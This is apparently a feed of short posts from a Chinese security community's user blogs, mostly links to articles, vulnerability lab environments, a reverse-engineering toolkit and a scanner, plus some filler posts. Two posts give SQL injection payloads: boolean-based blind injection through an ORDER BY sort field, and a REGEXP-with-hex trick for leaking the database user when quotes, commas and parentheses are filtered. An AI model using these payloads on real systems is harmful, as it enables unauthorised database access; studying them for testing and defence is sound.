用户
搜索
分享 order by注入
tony2016 2019-5-24 10:24
"sort_order":"desc,if(length(current_user)=5,1,(select 1 union select 2))" "sort_order":"desc,if(1=1,1,(select 1 union select 2))" 正常返回 "sort_order":"desc,if(1=2,1,(select 1 union select 2))" 异常返回
2 次阅读|0 个评论
分享 心情复杂
手机用户gvky85 2019-5-22 21:23
接触到了新大陆 心情复杂
1 次阅读|0 个评论
分享 浅谈RASP技术攻防之实战(环境配置与代码实现)
tony2016 2019-5-17 14:48
https://www.freebuf.com/articles/web/202806.html
11 次阅读|0 个评论
分享 docker搭建漏洞环境
tony2016 2019-5-14 10:13
Java代码审计| Spring框架思路篇:https://bbs.ichunqiu.com/thread-44283-1-1.html 在docker中获取Spring漏洞环境源码(默认已有docker环境) docker漏洞环境靶场( http://vulhub.org/#/environments/ ) docker漏洞环境( https://hub.docker.com/u/vulhub/ ) 查看你要拉取镜像与方法(或docker中使用搜 ...
12 次阅读|0 个评论
分享 当mysql遇到过滤‘,() 咋办?
tony2016 2019-5-13 17:29
当mysql遇到过滤‘,() 咋办?
很多时候,针对mysql数据库在做防注入的时候,会过滤 单引号、逗号和括号。 那么这个时候是否就真的一点数据都不能跑了呢,答案是否定的。 这个时候我们可以考虑使用regexp函数来读取一部分数据。 SELECT * FROM user where id=24 and current_user REGEXP 0x726f6f744025; 其中 0x726f6f744025 是root@%的 ...
15 次阅读|0 个评论
分享 Android安全之软件逆向核心分析APK【云盘精灵】
tony2016 2019-5-8 23:38
https://www.yunpanjingling.com/resources/5ad467e03595d7680f4ae8e3 工具包网盘链接 : https://pan.baidu.com/s/1r42JL5KznDrKORkJOjSX2g 密码 : 9m8q Apk 网盘链接 : https://pan.baidu.com/s/1ul0TLiAl7tRgEYkBEg6l8g 密码 : 7zis
29 次阅读|0 个评论
分享 第一篇日志
ich600097db7d 2019-5-7 15:01
时间很紧了,安全竞赛,需要神助
9 次阅读|0 个评论
分享 发的规范的规范的规范的规范的个地方
手机用户lQjYEN 2019-5-5 20:10
发的规范的规范的规范的规范的个地方发的规范的规范的规范的规范的个地方发的规范的规范的规范的规范的个地方
5 次阅读|0 个评论
分享 规范的东风股份的个地方个地方鬼地方个地方
手机用户lQjYEN 2019-5-5 20:10
规范的东风股份的个地方个地方鬼地方个地方规范的东风股份的个地方个地方鬼地方个地方规范的东风股份的个地方个地方鬼地方个地方规范的东风股份的个地方个地方鬼地方个地方
4 次阅读|0 个评论
分享 yandi-scanner开源扫描器
tony2016 2019-4-29 11:31
https://github.com/RASSec/yandi-scanner
22 次阅读|0 个评论